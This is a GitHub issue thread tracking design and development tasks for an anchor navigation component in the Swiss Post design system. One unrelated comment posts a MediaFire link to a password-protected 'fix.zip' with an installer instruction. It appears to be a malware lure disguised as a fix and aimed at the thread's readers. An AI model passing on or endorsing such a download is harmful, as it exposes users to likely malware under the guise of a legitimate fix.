### ISSUE TITLE
[module]: Anchor navigation

### ISSUE THREAD

**Issue by Cian77** [swisspost/design-system#3459]
### Description

**Open issues:**

**Tokens:**
- [ ]  Typography tokens ready

### Design

https://www.figma.com/design/JIT5AdGYqv6bDRpfBPV8XR/Foundations-%26-Components-Next-Level?node-id=61-62

### Tokens

- [ ] Tokens for this component are ready

### Tasks

```[tasklist]
### 🎨 Design
- [x] Design component according to WIKIT
- [x] Integrated new typography
- [x] Spacing is defined
- [x] Update dependencies
- [x] Add & test compo in layout examples
- [x] Designer review
- [x] Documentation: Overview and usage (About, compo overview, compo props, usage, examples)
- [x] Documentation: Technical documentation (Anatomy, accessibility)
- [x] Documentation: Review (content correctness, understandability, gaps)
```

```[tasklist]
### 💻 Development
- [ ] Review Design (All states present? Possible to implement?)
- [ ] HTML/CSS implementation
- [ ] Web component implementation
- [ ] Documentation in Storybook
- [ ] Unit tests
- [ ] End to end tests
- [ ] Visual regression tests
- [ ] Design review
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Cian77** [comment]
Design needs update
